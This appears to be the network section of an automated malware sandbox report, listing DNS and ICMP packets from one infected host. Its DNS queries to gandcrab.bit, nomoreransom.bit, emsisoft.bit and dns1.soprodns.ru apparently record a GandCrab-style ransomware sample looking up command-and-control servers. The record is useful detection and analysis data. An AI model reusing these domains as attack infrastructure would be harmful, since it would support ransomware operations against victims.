Sep 1, 2022 00:03:33.714600086 CEST	53	54285	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:33.715890884 CEST	54286	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:33.735584974 CEST	53	54286	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:33.736226082 CEST	54287	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:33.755711079 CEST	53	54287	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:33.756469965 CEST	54288	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:33.774130106 CEST	53	54288	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:33.940355062 CEST	59763	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:34.005925894 CEST	53	59763	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:34.015136957 CEST	59764	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:34.032443047 CEST	53	59764	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:34.032989979 CEST	59765	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:34.052963972 CEST	53	59765	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:34.053456068 CEST	59766	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:34.075452089 CEST	53	59766	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:34.075906992 CEST	59767	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:34.093806982 CEST	53	59767	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:34.095324039 CEST	59768	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:34.114725113 CEST	53	59768	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:34.286489964 CEST	54431	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:34.727765083 CEST	53	54283	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:35.289774895 CEST	54431	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:35.952977896 CEST	53	54431	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:35.959451914 CEST	54432	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:35.979208946 CEST	53	54432	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:35.979600906 CEST	54433	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:36.000792027 CEST	53	54433	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:36.001168966 CEST	54434	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:36.022969007 CEST	53	54434	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:36.023380995 CEST	54435	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:36.044903994 CEST	53	54435	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:36.045305967 CEST	54436	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:36.066387892 CEST	53	54436	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:36.244251013 CEST	65461	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:37.243447065 CEST	65461	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:37.278584003 CEST	53	65461	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:37.287781000 CEST	65462	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:37.308661938 CEST	53	65462	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:37.309587002 CEST	65463	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:37.330910921 CEST	53	65463	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:37.331573009 CEST	65464	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:37.351093054 CEST	53	65464	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:37.351948977 CEST	65465	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:37.372787952 CEST	53	65465	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:37.373698950 CEST	65466	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:37.393057108 CEST	53	65466	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:37.563853979 CEST	50090	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:38.572907925 CEST	50090	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:38.649069071 CEST	53	50090	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:38.657994032 CEST	50091	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:38.677830935 CEST	53	50091	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:38.678469896 CEST	50092	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:38.699517965 CEST	53	50092	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:38.699985027 CEST	50093	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:38.719789982 CEST	53	50093	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:38.722516060 CEST	50094	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:38.740737915 CEST	53	50094	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:38.741457939 CEST	50095	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:03:38.761935949 CEST	53	50095	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:39.094896078 CEST	53	54431	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:40.677587986 CEST	53	50090	8.8.8.8	192.168.2.3
Sep 1, 2022 00:03:41.002669096 CEST	53	65461	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Sep 1, 2022 00:01:39.520570993 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:01:40.783612013 CEST	192.168.2.3	8.8.8.8	cff3	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:01:50.793490887 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:01:52.259394884 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:01.915915966 CEST	192.168.2.3	8.8.8.8	cff3	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:11.967726946 CEST	192.168.2.3	8.8.8.8	cff3	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:12.999253988 CEST	192.168.2.3	8.8.8.8	cff3	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:14.387639999 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:17.505326033 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:18.912524939 CEST	192.168.2.3	8.8.8.8	cff3	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:19.930841923 CEST	192.168.2.3	8.8.8.8	cff3	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:22.074431896 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:26.716536045 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:27.817651033 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:33.986866951 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:39.027971983 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:42.283472061 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:47.096530914 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:53.169331074 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:54.727473974 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:02:57.449881077 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:01.595396042 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:02.946669102 CEST	192.168.2.3	8.8.8.8	cff3	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:03.968327999 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:06.090796947 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:15.886845112 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:17.783652067 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:19.698307991 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:23.514821053 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:25.947057962 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:26.542293072 CEST	192.168.2.3	8.8.8.8	cff3	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:28.692326069 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:34.727960110 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:39.095027924 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable
Sep 1, 2022 00:03:40.678124905 CEST	192.168.2.3	8.8.8.8	d030	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 1, 2022 00:01:23.064902067 CEST	192.168.2.3	8.8.8.8	0x6ee5	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:23.994477034 CEST	192.168.2.3	8.8.8.8	0x76ae	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:24.049179077 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:24.068248034 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:24.090037107 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:24.124614954 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:24.145241976 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:25.247797012 CEST	192.168.2.3	8.8.8.8	0xb801	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:25.310718060 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:25.328521967 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:25.347117901 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:25.367458105 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:25.385521889 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:26.844472885 CEST	192.168.2.3	8.8.8.8	0xa52f	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:27.464441061 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:27.482734919 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:27.503001928 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:27.526552916 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:27.550731897 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:33.534245014 CEST	192.168.2.3	8.8.8.8	0x9347	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:34.150069952 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:34.170593023 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:34.192981005 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:34.214782953 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:34.235760927 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:35.764401913 CEST	192.168.2.3	8.8.8.8	0x69c7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:36.800379992 CEST	192.168.2.3	8.8.8.8	0x69c7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:37.845704079 CEST	192.168.2.3	8.8.8.8	0x69c7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:38.440474033 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:38.460692883 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:38.479108095 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:38.500366926 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:38.529181004 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:39.759217024 CEST	192.168.2.3	8.8.8.8	0xc269	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:39.895581007 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:39.931324959 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:39.951734066 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:39.971865892 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:39.990387917 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:41.157733917 CEST	192.168.2.3	8.8.8.8	0xf1f3	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:41.261158943 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:41.280695915 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:41.302395105 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:41.321666956 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:41.349610090 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:42.602513075 CEST	192.168.2.3	8.8.8.8	0x8ba	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:42.666846037 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:42.686131001 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:42.707643986 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:42.729662895 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:42.750967026 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:43.750798941 CEST	192.168.2.3	8.8.8.8	0x25e1	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:43.818617105 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:43.838372946 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:43.859132051 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:43.883100033 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:43.903173923 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:44.873297930 CEST	192.168.2.3	8.8.8.8	0x51fb	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:45.432225943 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:45.451637030 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:45.473540068 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:45.495695114 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:45.515640020 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:46.825660944 CEST	192.168.2.3	8.8.8.8	0xb432	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:46.895714045 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:46.914019108 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:46.934129953 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:46.954180956 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:46.974641085 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:47.966227055 CEST	192.168.2.3	8.8.8.8	0x1543	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:48.969243050 CEST	192.168.2.3	8.8.8.8	0x1543	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:50.027492046 CEST	192.168.2.3	8.8.8.8	0x1543	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:50.193775892 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:50.247028112 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:50.267332077 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:50.489646912 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:50.543832064 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:52.586035013 CEST	192.168.2.3	8.8.8.8	0x84	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:53.206665039 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:53.226526976 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:53.251460075 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:53.271847010 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:53.290249109 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:54.258793116 CEST	192.168.2.3	8.8.8.8	0x1368	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:54.856652975 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:54.875889063 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:54.898417950 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:54.918395996 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:54.940366030 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:01:55.904305935 CEST	192.168.2.3	8.8.8.8	0xb069	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:56.898372889 CEST	192.168.2.3	8.8.8.8	0xb069	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:57.597537994 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:57.617695093 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:57.638087034 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:57.658266068 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:57.681284904 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:01:58.788856030 CEST	192.168.2.3	8.8.8.8	0x34ae	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:59.402009010 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:59.423880100 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:59.444335938 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:01:59.462826967 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:59.483040094 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:00.502871990 CEST	192.168.2.3	8.8.8.8	0x6c80	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:00.582490921 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:00.604247093 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:00.624524117 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:00.646017075 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:00.665796041 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:01.677488089 CEST	192.168.2.3	8.8.8.8	0xe958	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:01.768798113 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:01.788641930 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:01.814516068 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:01.832803965 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:01.851233959 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:02.841990948 CEST	192.168.2.3	8.8.8.8	0xb441	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:02.966444016 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:02.984507084 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:03.004766941 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:03.023139000 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:03.043257952 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:04.111052990 CEST	192.168.2.3	8.8.8.8	0xf2b7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:04.748806953 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:04.768620968 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:04.790776014 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:04.820486069 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:04.842170000 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:05.931890965 CEST	192.168.2.3	8.8.8.8	0x3f9e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
